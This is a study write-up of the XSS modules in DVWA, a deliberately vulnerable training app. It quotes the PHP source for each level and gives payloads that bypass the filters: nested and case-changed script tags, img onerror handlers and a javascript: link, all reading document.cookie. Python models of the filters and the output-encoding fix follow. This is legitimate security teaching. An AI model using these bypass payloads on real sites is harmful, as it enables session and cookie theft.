DVWA XSS study notes
My own small notes; corrections welcome if there are mistakes.
This covers the XSS modules in DVWA, reflected and stored, approached as a white-box test (reading the PHP source behind each level).
XSS (Reflected)
Level 1: low
Source:
<?php
header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
In this code the 'name' parameter is echoed straight into the page with no filtering and no HTML encoding (and the X-XSS-Protection: 0 header switches off the browser's legacy reflected-XSS auditor, so nothing in the browser blocks it either). So we test it directly with a JavaScript payload.
payload:
<script>alert(document.cookie)</script>
Level 2: medium
Source:
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    // str_replace() replaces a literal substring; it is case-sensitive and makes a single pass
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>
Here str_replace() removes the literal string '<script>' from 'name'. It makes a single pass (the result is not rescanned), and it is case-sensitive, so a tag nested inside itself re-forms after the inner copy is removed, and a tag with different casing is not matched at all. Note that only the opening tag is matched: '</script>' is never touched, so the closing tag needs no trick.
We construct payloads:
<scr<script>ipt>alert(document.cookie)</script>
<scR<script>ipt>alert(document.cookie)</SCRIPT>
<SCript>alert(document.cookie)</SCRIPT>
Nesting the <script> tag or changing its case bypasses the filter. Since nothing but the literal '<script>' is removed, the event-handler payload used at the high level below works here as well.
Level 3: high
Source:
<?php
header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    // preg_replace() does a regular-expression search and replace; the /i modifier makes it case-insensitive
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>
The source now runs a regular-expression search-and-replace on 'name': any '<' followed, in order and with anything in between, by the letters s, c, r, i, p, t is removed, case-insensitively, so neither nesting nor case changes can rebuild a <script> tag. But the filter targets only that one letter sequence: other tags and their event-handler attributes are not filtered at all, and the output is still not HTML-encoded.
So we build the payload around an event handler instead. One caveat: because the regex matches the letters anywhere after a '<', the whole payload must not contain s, c, r, i, p, t in that order; alert(document.cookie) is fine.
<img src='!' onerror=alert(document.cookie)>
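To make the three reflected filters concrete, here is an added Python model of them (my own illustration, not DVWA's PHP): filter_low, filter_medium and filter_high re-implement the three treatments of 'name' above with the same single-pass, case-sensitive replacement and the same case-insensitive regex, and a small check reports whether the echoed page still carries a <script> tag or an on*= handler. filter_fixed shows the proper fix, encoding for the HTML text context at output (html.escape with quote=True is the counterpart of htmlspecialchars($name, ENT_QUOTES, 'UTF-8')). The payload list is constructed from this page, and the "live markup" check is a heuristic for the demo, not a real HTML parser.

```python
import html
import re

# Added example: Python re-implementations of the DVWA reflected-XSS
# filters discussed on this page, for illustration only (not DVWA's code).


def filter_low(name: str) -> str:
    """Low: no filtering at all."""
    return name


def filter_medium(name: str) -> str:
    """Medium: str_replace('<script>', '', $name).
    str.replace() has the same semantics: every literal, case-sensitive
    occurrence is removed in one pass and the result is not rescanned,
    so '<scr<script>ipt>' collapses back into '<script>'."""
    return name.replace("<script>", "")


SCRIPT_RE = re.compile(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", re.IGNORECASE)


def filter_high(name: str) -> str:
    """High: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name).
    A '<' followed, in order, by s c r i p t (anything in between, any case)
    is removed; other tags and on*= attributes are left alone."""
    return SCRIPT_RE.sub("", name)


def filter_fixed(name: str) -> str:
    """The actual fix: encode for the HTML text context at output instead of
    blocklisting one tag name. quote=True also encodes both quote characters,
    like htmlspecialchars($name, ENT_QUOTES, 'UTF-8')."""
    return html.escape(name, quote=True)


def render(name_filter, name: str) -> str:
    """The echo line from the source: <pre>Hello {name}</pre>."""
    return "<pre>Hello " + name_filter(name) + "</pre>"


# Heuristic check for the demo: did a script tag or an event-handler
# attribute reach the browser as live markup?
LIVE_SCRIPT_RE = re.compile(r"<script\b", re.IGNORECASE)
LIVE_HANDLER_RE = re.compile(r"<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def renders_script(page: str) -> bool:
    return bool(LIVE_SCRIPT_RE.search(page) or LIVE_HANDLER_RE.search(page))


# Constructed sample input: the payloads used on this page.
PLAIN = "<script>alert(document.cookie)</script>"
NESTED = "<scr<script>ipt>alert(document.cookie)</script>"
CASED = "<SCript>alert(document.cookie)</SCRIPT>"
IMG_ONERROR = "<img src='!' onerror=alert(document.cookie)>"

PAYLOADS = [("plain", PLAIN), ("nested", NESTED),
            ("cased", CASED), ("img", IMG_ONERROR)]


def survivors(name_filter) -> list:
    """Labels of the payloads that are still live after the given filter."""
    return [label for label, p in PAYLOADS
            if renders_script(render(name_filter, p))]


if __name__ == "__main__":
    for level, f in [("low", filter_low), ("medium", filter_medium),
                     ("high", filter_high), ("fixed", filter_fixed)]:
        print(f"{level:7s} live payloads: {survivors(f)}")
```

Running it prints the payloads that survive each level: all four at low, everything but the plain <script> tag at medium, only the <img onerror> payload at high, and none once the value is encoded at output.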
XSS (Stored)
Level 1: low
Source:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    // trim() strips whitespace (or other listed characters) from both ends of the string
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>
As you can see there is no filtering of HTML at all: the input is only escaped for the SQL query (mysqli_real_escape_string protects the INSERT, not the browser), then stored and later displayed as-is. Both input boxes are injection points.
The name box has a maxlength of 10, but that limit lives only in the browser's form: open F12, change it to a larger number (or send the POST request directly), and then insert the test code.
payload:
<a href='javascript:alert(document.cookie)'>
<script>prompt(document.cookie)</script>
The first one needs a click: because the <a> tag is never closed, the text that follows it in the guestbook becomes the link. The second fires as soon as the page is viewed.
Level 2: medium
Source:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>
The key lines:
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name = trim( $_POST[ 'txtName' ] );
    $message = strip_tags( addslashes( $message ) );
    $message = htmlspecialchars( $message );
    $name = str_replace( '<script>', '', $name );
trim() removes whitespace from both ends of $message and $name. $message is then passed through addslashes(), which prefixes quotes, backslashes and NUL with a backslash, through strip_tags(), which removes HTML tags, and finally through htmlspecialchars(), which converts the special characters &, <, > and " to HTML entities, so nothing injected into the message can render as markup.
$name, on the other hand, only has the literal '<script>' removed (single pass, case-sensitive), exactly as in the medium reflected level. Use Firebug or the F12 dev tools to raise the maxlength on the name field,
then get past the filter with case changes, nested tags, or a different tag altogether.
payload:
<img src='#' onerror=confirm(document.cookie)>
Make sure the attribute is spelled src: an <img> with no src attribute at all never fires onerror, so a typo such as scr= silently breaks the payload.
Level 3: high
Source:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>
The same filtering as medium, except that $name now goes through the case-insensitive regex that removes any '<' followed by s, c, r, i, p, t, so case changes and nested tags no longer work. Other tags and their event handlers are still untouched, and the stored name is still printed without HTML encoding, so the event-handler payload still applies (again with src, not scr):
payload: <img src='#' onerror="confirm(/xss/)">
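To show why the stored variant is no different once the value comes back out of the database, here is an added Python model of the high-level guestbook flow (my own illustration, not DVWA's code; it assumes a rough stand-in for strip_tags and an approximate guestbook HTML layout). The INSERT is parameterised through sqlite3, so SQL is not the issue. The message takes the strip_tags-then-htmlspecialchars path from the source, the name only the <..s..c..r..i..p..t regex; render_guestbook then returns the stored name as live markup, or, with encoding at output, as harmless text. The server never checks the name length, which is why the maxlength on the form is no obstacle.

```python
import html
import re
import sqlite3

# Added example (not DVWA's code): in-memory model of the stored-XSS
# guestbook at the high level, to show where the defence has to sit.

SCRIPT_RE = re.compile(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", re.IGNORECASE)
TAG_RE = re.compile(r"<[^>]*>")  # rough stand-in for PHP strip_tags()
LIVE_RE = re.compile(r"<script\b|<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def sanitize_message(message: str) -> str:
    """Message path (medium and high): strip_tags() then htmlspecialchars().
    quote=False is an approximation: PHP's default also encodes the double
    quote, but neither encodes the single quote."""
    return html.escape(TAG_RE.sub("", message), quote=False)


def sanitize_name_high(name: str) -> str:
    """Name path (high): only the case-insensitive <..s..c..r..i..p..t regex."""
    return SCRIPT_RE.sub("", name)


def open_guestbook() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE guestbook (comment TEXT, name TEXT)")
    return db


def sign(db: sqlite3.Connection, name: str, message: str) -> None:
    """Server side of btnSign. There is no length check here: the
    maxlength="10" on the name field exists only in the browser's form,
    so editing it in the dev tools or sending the POST by hand gets past it.
    The parameterised INSERT takes the place of mysqli_real_escape_string,
    which protects the SQL statement and nothing else."""
    db.execute("INSERT INTO guestbook (comment, name) VALUES (?, ?)",
               (sanitize_message(message), sanitize_name_high(name)))


def render_guestbook(db: sqlite3.Connection, encode_name_on_output: bool) -> str:
    """Approximation of the guestbook output. With encode_name_on_output the
    stored name is HTML-encoded at the point of output, the counterpart of
    htmlspecialchars($name, ENT_QUOTES, 'UTF-8'). The comment was already
    entity-encoded before storage, so it is not encoded a second time:
    doing so would show '&lt;' to the user as '&amp;lt;'."""
    rows = []
    for comment, name in db.execute("SELECT comment, name FROM guestbook"):
        if encode_name_on_output:
            name = html.escape(name, quote=True)
        rows.append(f"<div>Name: {name}<br />Message: {comment}<br /></div>")
    return "\n".join(rows)


def live_markup(page: str) -> bool:
    """True if a <script> tag or an on*= handler attribute reached the page."""
    return LIVE_RE.search(page) is not None


# Constructed sample input: the two payloads from the stored-XSS section.
# The name is far longer than the form's maxlength of 10.
NAME_PAYLOAD = "<img src='#' onerror=confirm(/xss/)>"
MESSAGE_PAYLOAD = "<script>prompt(document.cookie)</script>"


def run_demo() -> dict:
    """Sign the guestbook once and report what is stored and what renders."""
    db = open_guestbook()
    sign(db, NAME_PAYLOAD, MESSAGE_PAYLOAD)
    stored_comment, stored_name = db.execute(
        "SELECT comment, name FROM guestbook").fetchone()
    return {
        "stored_name": stored_name,
        "stored_comment": stored_comment,
        "dvwa_live": live_markup(render_guestbook(db, encode_name_on_output=False)),
        "fixed_live": live_markup(render_guestbook(db, encode_name_on_output=True)),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

The stored comment comes back as plain text (strip_tags removed the tags), while the stored name comes back exactly as submitted and is live in the DVWA-style output; the only change that makes it inert is encoding the name when it is written into the page.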
Let's learn and improve together!
Reference:
https://www.freebuf.com/articles/web/157953.html
Date: 2019.5.7